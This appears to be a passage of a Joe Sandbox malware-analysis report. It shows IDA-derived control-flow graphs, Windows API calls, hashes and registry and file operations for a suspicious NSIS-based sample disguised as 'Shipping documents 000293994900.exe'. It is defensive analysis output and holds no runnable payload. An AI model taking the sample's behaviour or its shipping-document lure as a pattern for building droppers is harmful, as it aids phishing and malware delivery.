                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$Pointer$CountTickWrite
                                                • String ID: x>A
                                                • API String ID: 2146148272-3854404225
                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 852 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 859 4029c5-4029d4 852->859 860 40237b-402383 852->860 862 402385-402392 call 402b38 lstrlenW 860->862 863 402396-402399 860->863 862->863 866 4023a9-4023ac 863->866 867 40239b-4023a8 call 402b1b 863->867 868 4023bd-4023d1 RegSetValueExW 866->868 869 4023ae-4023b8 call 403060 866->869 867->866 873 4023d3 868->873 874 4023d6-4024b0 RegCloseKey 868->874 869->868 873->874 874->859 877 402791-402798 874->877 877->859
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp
                                                • API String ID: 1356686001-1339453875
                                                • Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                • Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 878 4015b9-4015cd call 402b38 call 4059de 883 401614-401617 878->883 884 4015cf-4015eb call 405960 CreateDirectoryW 878->884 886 401646-402195 call 401423 883->886 887 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 883->887 891 40160a-401612 884->891 892 4015ed-4015f8 GetLastError 884->892 899 4029c5-4029d4 886->899 887->899 901 40163e-401641 887->901 891->883 891->884 895 401607 892->895 896 4015fa-401605 GetFileAttributesW 892->896 895->891 896->891 896->895 901->899
                                                APIs
                                                  • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004059EC
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens,?,00000000,000000F0), ref: 00401630
                                                Strings
                                                • C:\Users\user\Uploadable\normallnnens, xrefs: 00401623
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\Uploadable\normallnnens
                                                • API String ID: 3751793516-2478767733
                                                • Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                • Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 904 10001771-100017ad call 10001b3e 908 100017b3-100017b7 904->908 909 100018be-100018c0 904->909 910 100017c0-100017cd call 100022eb 908->910 911 100017b9-100017bf call 100022a1 908->911 916 100017fd-10001804 910->916 917 100017cf-100017d4 910->917 911->910 918 10001824-10001828 916->918 919 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 916->919 920 100017d6-100017d7 917->920 921 100017ef-100017f2 917->921 926 10001866-1000186c call 1000248d 918->926 927 1000182a-10001864 call 100015cc call 1000248d 918->927 943 1000186d-10001871 919->943 924 100017d9-100017da 920->924 925 100017df-100017e0 call 10002870 920->925 921->916 922 100017f4-100017f5 call 10002b2b 921->922 936 100017fa 922->936 931 100017e7-100017ed call 10002614 924->931 932 100017dc-100017dd 924->932 939 100017e5 925->939 926->943 927->943 942 100017fc 931->942 932->916 932->925 936->942 939->936 942->916 947 10001873-10001881 call 10002450 943->947 948 100018ae-100018b5 943->948 954 10001883-10001886 947->954 955 10001899-100018a0 947->955 948->909 950 100018b7-100018b8 GlobalFree 948->950 950->909 954->955 956 10001888-10001890 954->956 955->948 957 100018a2-100018ad call 10001555 955->957 956->955 958 10001892-10001893 FreeLibrary 956->958 957->948 958->955
                                                APIs
                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                • FreeLibrary.KERNEL32(?), ref: 10001893
                                                • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                  • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3
                                                  • Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686
                                                  • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                  • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                  • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
                                                  • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                • String ID:
                                                • API String ID: 1767494692-3916222277
                                                • Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                • Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
                                                • Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                • Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 961 403060-40306e 962 403070-403086 SetFilePointer 961->962 963 40308c-403095 call 40317b 961->963 962->963 966 403175-403178 963->966 967 40309b-4030ae call 405bd7 963->967 970 403161 967->970 971 4030b4-4030c8 call 40317b 967->971 973 403163-403164 970->973 971->966 975 4030ce-4030d1 971->975 973->966 976 4030d3-4030d6 975->976 977 40313d-403143 975->977 980 403172 976->980 981 4030dc 976->981 978 403145 977->978 979 403148-40315f ReadFile 977->979 978->979 979->970 982 403166-40316f 979->982 980->966 983 4030e1-4030eb 981->983 982->980 984 4030f2-403104 call 405bd7 983->984 985 4030ed 983->985 984->970 988 403106-40311b WriteFile 984->988 985->984 989 403139-40313b 988->989 990 40311d-403120 988->990 989->973 990->989 991 403122-403135 990->991 991->983 992 403137 991->992 992->980
                                                APIs
                                                • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID: x>A
                                                • API String ID: 539440098-3854404225
                                                • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 993 405db5-405de7 RegOpenKeyExW 994 405e29-405e2c 993->994 995 405de9-405e08 RegQueryValueExW 993->995 996 405e16 995->996 997 405e0a-405e0e 995->997 999 405e19-405e23 RegCloseKey 996->999 998 405e10-405e14 997->998 997->999 998->996 998->999 999->994
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
                                                • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Call
                                                • API String ID: 3677997916-1824292864
                                                • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405BA1
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-44229769
                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                APIs
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                • Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                • CloseHandle.KERNEL32(?), ref: 00405695
                                                Strings
                                                • Error launching installer, xrefs: 00405676
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                APIs
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-2030658151
                                                • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
